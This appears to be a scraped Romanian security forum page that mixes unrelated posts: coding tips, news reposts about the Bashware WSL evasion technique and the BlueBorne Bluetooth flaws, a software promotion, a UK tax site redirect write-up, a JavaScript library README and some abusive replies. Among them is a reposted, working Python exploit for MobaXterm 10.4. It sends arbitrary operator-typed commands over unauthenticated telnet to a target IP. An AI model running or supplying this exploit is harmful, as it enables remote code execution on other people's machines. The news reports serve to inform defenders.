Leaderboard

Nu fiți răi, toți am început de undeva.. Conceptul de spaghetti code se referă la cod nearanjat, greu de citit și înțeles. Uite câteva sugestii pentru eliminarea spaghetti code-ului: mută secțiunile de cod care fac ceva anume în metode separate (ex. înregistrarea de useri să fie într-o clasă useri, alături de alte metode precum logare, verificare șamd) adaugă comentarii la cod, la început de clasă, la început de metodă și în metodă unde consideri util (îți zic sigur că după 6 luni de zile nu o să mai înțelegi ce e acolo indiferent dacă scriptul e scris de tine sau nu) aranjează metodele în clasele corespunzătoare verifică ca variabilele și metodele să aibă nume corespunzător (de ex. pentru o metodă care verifică logarea unui utilizator, nu o numești haiCuTata(String[] omulAlaNebun, String[] parolaDacaSioMaiAminteste)) importă doar clasele de care ai nevoie, nu imporți tot java.* dacă nu ai nevoie de toate funcțiile de pe acolo deobfuschează codul prin beautify sau alte funcționalități din IDE-ul pe care îl folosești rescrie metodele care nu fac sens sau care nu sunt optimizate

'Bashware' is a clever new type of malware that major antivirus programs can't detect. Microsoft surprised the technology world last year when it announced that users will be able to run native Linux applications in Windows 10 without virtualization. While this feature is meant to help developers, researchers believe it could be abused by attackers to hide malware from security products. Researchers from security firm Check Point Software Technologies developed a technique that uses Bash, the Linux command-line interface—or shell—that's now available in Windows, to make known malware undetectable. They named the result Bashware. The Windows 10 feature, called the Windows Subsystem for Linux (WSL), tricks Linux applications into believing they're communicating with the Linux kernel—the core part of the operating system that includes hardware drivers and essential services. In reality, those applications communicate with the WSL, which translates their system calls into equivalents for the Windows kernel. WSL was first announced in March 2016 and was added as a beta feature in the Windows 10 Anniversary Update, which was released in August 2016. Microsoft announced that it will become a fully supported feature in the upcoming Fall Creators Update. "WSL seems to be well designed. What allows Bashware to operate the way it does is the lack of awareness by various security vendors" WSL makes it easier for developers who need to write and test code both in Windows and Linux to do so without the overhead of a virtual machine. Many developers, whether they prefer Windows as their primary desktop OS or just need it for Visual Studio and other development tools, also like the simplicity of the Linux command line utilities for interacting with different programming language interpreters and component repositories. As it stands now, WSL is not turned on by default and users need to enable "development mode" on their systems in order to use it. However, Check Point claims that its Bashware attack automates the steps needed to silently enable WSL, download the Ubuntu-based userspace environment that comes with it, and then run malware inside. Linux programs executed through WSL will appear in Windows as "pico processes," a new type of process that is structurally different than those spawned by regular Windows applications. During their tests, the Check Point researchers found no security products that monitor pico processes, even though Microsoft provides a special application programming interface called the Pico API that can be used to do this. This apparent lack of interest by security vendors towards WSL might be the result of a widespread belief that users need to enable the feature manually and most of them won't do it because they don't have a need for it. However, according to Bashware's creators, "it's a little-known fact" that entering the developer mode can be achieved by modifying a few registry keys and this can be done silently in the background by an attacker who has the right privileges. A system reboot is indeed required under normal circumstances to enable WSL, but attackers could simply wait for victims to turn off their computers or could trigger a critical error to force a reboot, the Check Point researchers told me in an email. There might also be a way to load the WSL drivers manually without restarting the computer, but this method is still being investigated, they said. "We see it as both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware" What's interesting about Bashware is that attackers don't have to write malware programs for Linux in order to run them through WSL on Windows. Thanks to a program called Wine, they can use the technique to directly hide known Windows malware. In some ways, Wine is the equivalent of WSL on Linux, as it allows Linux users to run Windows programs on their systems without virtualization. The Bashware attack installs Wine inside the downloaded Ubuntu userspace environment and then launches Windows malware through it. Thanks to WSL, those malicious programs will be spawned back into Windows as pico processes, hiding them from security software. Check Point's Gal Elbaz and Dvir Atias are not the first security researchers to warn that attackers could abuse WSL to run malware. Reputed Windows internals expert Alex Ionescu called attention to the same risks in 2016 in talks at Black Hat USA and Microsoft's BlueHat conference. Ionescu, who is the vice president of endpoint detection and response strategy at security firm CrowdStrike, maintains a GitHub repository with his research on WSL. To some extent Bashware builds on Ionescu's prior findings, but the technique is adapted to the current state of WSL. It shows that one year later many security vendors are still not prepared to deal with this new technology. The good news is that in order to use Bashware, attackers need to already have administrator privileges on their victims' computers. This means they need to first compromise those systems using more traditional methods: phishing emails with malicious attachments, documents rigged with exploits for unpatched vulnerabilities, social engineering tricks, stolen administrative credentials and so on. Gaining admin rights on Windows computers is not necessarily a hard thing to do, and attackers do it all the time. However, these extra steps give security products a chance to detect and break attack chains before Bashware can be used to hide malicious payloads. The Check Point researchers declined to name the security products whose detection mechanisms they managed to bypass, noting that their goal is for this research to serve as a wakeup call for the entire security industry. WSL is not a common attack vector and if attackers were to use it as a source of attacks, they would first need to download malware onto the targeted computer, said Adam Bromwich, senior vice president of security technology and response at Symantec. "Based on this WSL architecture, Symantec's scanners, machine learning and protection technologies are designed to scan and detect malware created using WSL." Kaspersky Lab told me in an email it plans to modify its antivirus software to detect this type of malware in the future. Currently, all of the company's products can detect malware downloaders and other Windows-based parts of such attacks, Kaspersky Lab said. Antivirus firm Bitdefender did not immediately respond to a request for comment. We will update this post if we hear back. Update: This post has been updated with comment from Kaspersky, and has been updated to include more context about previous research in this area. Via vice.com

La cat de prost esti, stai dracu' in Rromania si nu mai pleca in alte parti sa faci neamul de ras. Ai auzit de pasapoarte biometrice? Mai ales daca e prima oara cand intri intr-o tara ti-l verifica prin aparat. Cele fake care trec de verificari se fac pe multe mii de euro, nu pe forumuri publice si doar prin contacte de incredere. Stai in banca ta si fute oi pe plaiurile natale!

Eight Bluetooth-related vulnerabilities (four that are critical) affecting over 5 billion Android, Windows and Linux devices could allow attackers to take control of devices, access corporate data and networks, and easily spread malware to other devices. Nearly all devices with Bluetooth capabilities, including smartphones, TVs, laptops, watches, smart TVs, and even some automobile audio systems, are vulnerable to this attack. If exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a "man-in-the-middle" to gain access to critical data and networks without user interaction. The vulnerabilities were found in the Bluetooth implementations in Android, Microsoft, Linux and iOS versions pre-iOS 10. Armis reported the vulnerabilities to Google, Microsoft, and the Linux community. Google and Microsoft are releasing updates and patches on Tuesday, September 12. Others are preparing patches that are in various stages of being released. These vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device. These proximity-based network vulnerabilities could allow attackers to create broad malware infections that could spread from one infected device to many others by wirelessly connecting to other devices over Bluetooth. The device-to-device connectivity nature of Bluetooth means an airborne (or "BlueBorne") attack could easily spread without any action required by a user. "These silent attacks are invisible to traditional security controls and procedures. Companies don't monitor these types of device-to-device connections in their environment, so they can't see these attacks or stop them," said Yevgeny Dibrov, CEO of Armis. "The research illustrates the types of threats facing us in this new connected age." There are two specific methods attackers could use with exploit code. They could: Connect to the target device in an undetected manner, then remotely execute code on that device. This would allow the attacker to take full control of a system, up to and including leveraging the device to gain access to corporate networks, systems, and data. Conduct a Man-in-the-Middle attack — effectively creating a Bluetooth Pineapple — to sniff traffic being sent between Bluetooth-enabled devices or spoof a legitimate Bluetooth device and hijack the connection and redirect traffic. This would enable attackers to download malware to devices and take complete control of them. This attack would not require additional hardware, as it uses the Bluetooth connection on the device against the device itself. The automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, makes these vulnerabilities all the more serious and pervasive. Once a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enabled devices in its vicinity, either inside an office or in more public locations. While waiting for the patch, users can disable Bluetooth to protect devices. SURSA: htp:/www.prnewswire.com/news-releases/armis-identifies-new-airborne-cyber-threat-blueborne-that-exposes-almost-every-device-to-remote-attack-30051700.html

WonderFox in colaborare cu partenerii săi au organizat o mare promotie, in cadrul careia sunt oferite GRATUIT nu mai putin de 9 programe cu licenta. Programele oferite sunt in valoare de $500 si este vorba despre urmatoarele titluri: WonderFox DVD Ripper Pro 9.0 Ashampoo Photo Commander 14 Zoom Player MAX AllMyNotes Organizer CrazyTalk Animator 2 Standard Wise Driver Care PDF to X + WinExt Pro Bundle WinSysClean X7 Watermark Software Pagina promotionala o gasim aici: http://www.videoconverterfactory.com/back-to-school/ Pentru a avea acces la promotie vizitati aceasta pagina promotionala, navigati in josul paginii pentru a alege programul dorit. Promotie valabila pana la data 04 septembrie–30 septembrie 2017.

Se pare ca nu esti atent: ce vrei tu sa faci (indiferent ca are ca scop obtinerea unui interviu/job sau ca serveste in cadrul unei farse) se cheama Fals in acte si este ilegal https://www.avocatnet.ro/forum/discutie_200724/care-este-pedeapsa-pentru-fals-in-acte.html Daca tu ai chef sa ajungi la inchisoare e treaba ta, dar ce te face sa crezi ca vrem sa fim, careva de pe aici, colegi cu tine?

You'd be surprised...

Author: sultan albalawi | Category: remote exploits | Platform: windows Date add: 12-09-2017 | Risk: [Security Risk Critical] | 0day-ID: 0day-ID-28494 import telnetlib,sys # Exploit Title: MobaXtrem 10.4 Remote Code Execution # Date: 11/9/2017 # Exploit Author: Sultan Albalawi # Vendor Homepage: http://mobatek.net # Software Link: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip # Version: 10.4 # Tested on: Windows Xp & Windows 7 & 10 # POC : https://www.youtube.com/watch?v=oYdzP0umtFA&feature=youtu.be # Vulnerability Cause::: # Telnet service doesn't authinticate for remote conncection which allows attacker to # pass malicious commands over victim box through protocol. print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \ "\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \ "\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \ "\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \ "\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \ "\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \ "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \ "\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \ "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \ "\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \ "\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \ "\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \ "\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \ "\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \ "\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \ "\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \ "\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \ "\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \ "\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \ "\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \ "\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \ "\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \ "\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \ "\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \ "\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \ "\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \ "\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \ "\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \ "\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \ "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \ "\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \ "\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \ "\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \ "\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \ "\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \ "\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \ "\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \ "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \ "\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \ "\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \ "\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \ "\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \ "\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \ "\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \ "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \ "\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \ "\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \ "\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \ "\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \ "\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \ "\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \ "\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \ "\x0a\x27\x27\x27" def get_set(HOST,cmd): try : tn = telnetlib.Telnet(HOST) bg="\x63\x79\x67\x73\x74\x61\x72\x74" tn.write(bg+" ./"+cmd+"\n") tn.write(main()) tn.read_all() except KeyboardInterrupt: print "[-] Execution stopped ... keyboard interrupt raised" except Exception as e: pass def main(): if len(sys.argv)==2: HOST = sys.argv[1] cmd = str(raw_input("cmd> ")) if "exit" in cmd : sys.exit("exiting...") else: print"Executing => %s"%cmd get_set(HOST,cmd) else: print "Usage: ./"+sys.argv[0]+" <target_ip>" if __name__ == '__main__': main() # 0day.today [2017-09-12] # Source: http://0day.today/exploit/28494

As I am now an adult, I sometimes need to look at taxes. The longstanding tradition of adults dictates that I must look at my taxes and say to my fellow adults “wow, I wish I had that money which is spent on single payer universal healthcare, infrastructure and education so I could spend it on video games, hardware I never use and thousands of tiny 3D printed statues of myself.”. Regardless, I didn’t expect my micro-sojourn into responsibility to result in a somewhat bad security issue followed by the ability to arbitrarily modify people’s tax details after making them click a link, followed by a 2 month journey to getting confirmed fixes. Welcome to my 3 step guide to hacking the uk tax system, I guess. The UK tax system login process is neat, and well thought out. One goes through an interstitial login web form which requests an identification number, a password, and a code texted to your cellular mobile device. On the technical side of things, this is achieved by the common redirect forwarding pattern in which the page that required login hands off to the login page with a note in parameter form saying where to send the user back to when the login process is successfully completed and you’re ready to dive into taxes and such. Source: https://medium.com/@Zemnmez/how-to-hack-the-uk-tax-system-i-guess-3e84b70f8b

@Dragos, mergand taras nu va reusi. Lasa-l sa invete intai sa mearga, de preferat, fara ajutor.

nu cred , chiar nu stiam wtf

https://play.google.com/store/apps/details?id=com.webzen.muorigin.global.google&hl=ro A facut deja.spor

Faci tu una ?

Versiunea de mobil?

De unde stii ca te confrunti cu spaghetti code daca nu stii cum arata spaghetti code?!

<♫/> Rythm.js - v2.1.1 - A javascript library that makes your page dance. Demo at: https://okazari.github.io/Rythm.js/ Getting started Install with npm npm install rythm.js CDN: https://unpkg.com/rythm.js/ https://cdnjs.cloudflare.com/ajax/libs/rythm.js/2.x.x/rythm.min.js Good old way Import rythm into your page <script type="text/javascript" src="/path/to/rythm.min.js"></script> Add one of the rythm css classes to indicate which element will dance. <div class="rythm-bass"></div> Create a Rythm object and give it your audio url then use the start function. var rythm = new Rythm(); rythm.setMusic("path/to/sample.mp3"); rythm.start(); ES6 module import Rythm from 'rythm.js' const rythm = new Rythm(); rythm.setMusic("path/to/sample.mp3"); rythm.start(); API Documentation Rythm object var rythm = new Rythm(); /* The starting scale is the minimum scale your elements will take (Scale ratio is startingScale + (pulseRatio * currentPulse)); * Value in percentage between 0-1 * Default 0.75 */ rythm.startingScale = value; /* The pulse ratio is be the maximum additionnal scale your element will take (Scale ratio is startingScale + (pulseRatio * currentPulse)) * Value in percentage between 0-1 * Default 0.30 */ rythm.pulseRatio = value; /* The max value history represent the number of passed value that will be stored to evaluate the current pulse. * Int value, minimum 1 * Default 100 */ rythm.maxValueHistory = value; /* Set the music the page will dance to. * @audioUrl : '../example/mysong.mp3' */ rythm.setMusic(audioUrl); /* Used to collaborate with other players library * You can connect Rythm to an audioElement, and then control the audio with your other player */ rythm.connectExternalAudioElement(audioElement) /* Adjust music's gain. * @value : Number */ rythm.setGain(value); /* Add your own rythm-class * @elementClass: Class that you want to link your rythm to. * @danceType : Use any of the build in effect or give your own function; * @startValue: The starting frequence of your rythm. * @nbValue: The number of frequences of your rythm. * 1024 Frequences, your rythm will react to the average of your selected frequences. * Examples : bass 0-10 ; medium 150-40 ; high 500-100 */ rythm.addRythm(elementClass, danceType, startValue, nbValue); /* Plug your computer microphone to rythm.js * This function return a promise resolved when the microphone is up. * Require your website to be run in HTTPS */ rythm.plugMicrophone().then(function(){...}) //Let's dance rythm.start(); //Stop the party rythm.stop(); Build in classes with "pulse" effect rythm-bass rythm-medium rythm-high Custom-classes You can use the addRythm function to make your own classes listen to specifics frequences. Here is how the basics classes are created : addRythm('rythm-bass','pulse',0,10); addRythm('rythm-medium','pulse',150,40); addRythm('rythm-high','pulse',500,100); Available dance types For more control of theses dance types, you can give a configuration object as last argument to addRythm addRythm('rythm-high', 'shake', 500, 100, { direction:'left', min: 20, max: 300}); Here are the build in dances and their options pulse min : Minimum value given to transform: scale(). Default: 0.75 max : Maximum value given to transform: scale(). Default: 1.25 jump min : Minimum value given to transform: translateY(). Default: 0 max : Maximum value given to transform: translateY(). Default: 30 shake min : Minimum value given to transform: translateX(). Default: -15 max : Maximum value given to transform: translateX(). Default: 15 direction : left for a right to left move, right for a left to right move. Default: right twist min : Minimum value given to transform: rotate(). Default: -20 max : Maximum value given to transform: rotate(). Default: 20 direction : left for a right to left move, right for a left to right move. Default: right vanish min : Minimum value (between 0 and 1) given to opacity. Default: 0 max : Maximum value (between 0 and 1) given to opacity. Default: 1 reverse : Boolean to reverse the effect. Default false (Higher the pulse is, the more visible it will be) color from : Array of integer between 0 and 255 corresponding to a RGB color. Default: [0,0,0] to : Array of integer between 0 and 255 corresponding to a RGB color. Default: [255,255,255] To see each visual effect, you can go to the Demo Custom dance type If you want to use your own dance type, you can give a function as the 2nd argument of addRythm /* The custom function signature is : * @elem: The HTML element target you want to apply your effect to * @value: The current pulse ratio (percentage between 0 and 1) * @options: The option object user can give as last argument of addRythm function */ const pulse = (elem, value, options = {}) => { const max = options.max || 1.25 const min = options.min || 0.75 const scale = (max - min) * value elem.style.transform = `scale(${min + scale})` } addRythm('my-css-class', pulse, 150, 40) Features Your HTML can dance by using any of the available dance types You can use custom functions to build you own dance type (and if it looks awesome ! Feel free to make a PR ) Contribute Any pull request will be apreciated. You can start coding on this project following this steps : Fork the project Clone your repository run npm install run npm start in the main folder to launch a development webserver. Enjoy the rythm. Adding new dance type In v2.0.x adding a new dance type is pretty easy Create a new file in src\dances This file must export your custom dance type function For example, here is the content of jump.js file /* The function signature is : * @elem: The HTML element target you want to apply your effect to * @value: The current pulse ratio (percentage between 0 and 1) * @options: The option object user can give as last argument of addRythm function */ export default (elem, value, options = {}) => { const max = options.max || 30 const min = options.min || 0 const jump = (max - min) * value elem.style.transform = `translateY(${-jump}px)` } Import it and register it into the constructor of Dancer.js file import jump from './dances/jump.js' class Dancer { constructor() { this.registerDance('jump', jump) } } Commit it and create a PR. Then look at everyone enjoying your contribution ! Licence : GNU GPL Author: @OkazariBzh Download: Rythm.js-master.zip or git clone https://github.com/Okazari/Rythm.js.git Source: https://github.com/Okazari/Rythm.js

"Gandirea Laterala". Buna carte. http://www.metropolis.ro/books/book.php?product_id=1016

Da, momentan pwn este aproape finalizat si testat de noi ( @SilenTx0 inca lucreaza la ceva tutoriale). Peste putin timp o sa puteti sa accesati versiunea beta.

mu(e) online ?